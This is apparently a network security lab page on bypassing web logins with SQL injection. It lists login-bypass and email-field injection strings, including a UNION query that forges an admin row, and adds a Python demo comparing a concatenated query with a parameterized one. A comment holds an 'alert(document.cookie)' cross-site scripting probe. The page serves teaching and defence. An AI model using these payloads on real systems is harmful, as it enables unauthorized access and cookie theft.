SQL Injection (Lab 8 Network Security)

In this lab, you have to bypass a web login authentication process by using SQL injection. You also need to list 10 SQL injection codes.

*****************************************

 

SQL Injection 101, Login tricks

  • admin' --
  • admin' #
  • admin'/*
  • ' or 1=1--
  • ' or 1=1#
  • ' or 1=1/*
  • ') or '1'='1--
  • ') or ('1'='1--
  • Username : admin Password : 1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
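
Why the first strings in the list work, and what stops them: the added example below (not part of the original lab) runs two of them against a login query built by string concatenation and against the same query with bound parameters. The `users` table, the sample account and the function names are assumptions made for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample data: one account, plaintext password only for brevity.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 's3cret-constructed')")
    return db

def login_concat(db, username, password):
    # Vulnerable: user input is pasted into the SQL text, so a quote in
    # `username` ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # malformed SQL after injection; treat as failed login
    return row[0] if row else None

def login_param(db, username, password):
    # Hardened: placeholders send the values separately from the SQL text,
    # so quotes and comment markers are compared as ordinary characters.
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None

def run_lab():
    db = make_db()
    results = {}
    # Two strings from the list above, in the form SQLite accepts
    # (SQLite has no '#' comment, so those variants are MySQL-only).
    for payload in ["admin' --", "' or 1=1--"]:
        results[payload] = (login_concat(db, payload, "wrong"),
                            login_param(db, payload, "wrong"))
    return results

if __name__ == "__main__":
    for payload, (concat, param) in run_lab().items():
        print(f"{payload!r}: concatenated -> {concat}, parameterized -> {param}")
```

With the concatenated query the comment marker removes the password check, so the wrong password still logs in as admin; with bound parameters the same input simply matches no user.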

 

For email injection:

  1. x' AND email IS NULL; --
  2. x' AND userid IS NULL; --
  3. x' OR full_name LIKE '%Bob%

 

Since our campus Websense blocks certain SQL injection tutorials, here is the offline copy.

  1. SQL Injection Attacks by Example.pdf
  2. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/#ByPassingLoginScreens
  1. nice info thx man

    • John
    • February 1st, 2012

    alert(document.cookie);

    • John
    • February 1st, 2012

    A

    • John
    • February 1st, 2012

    AB
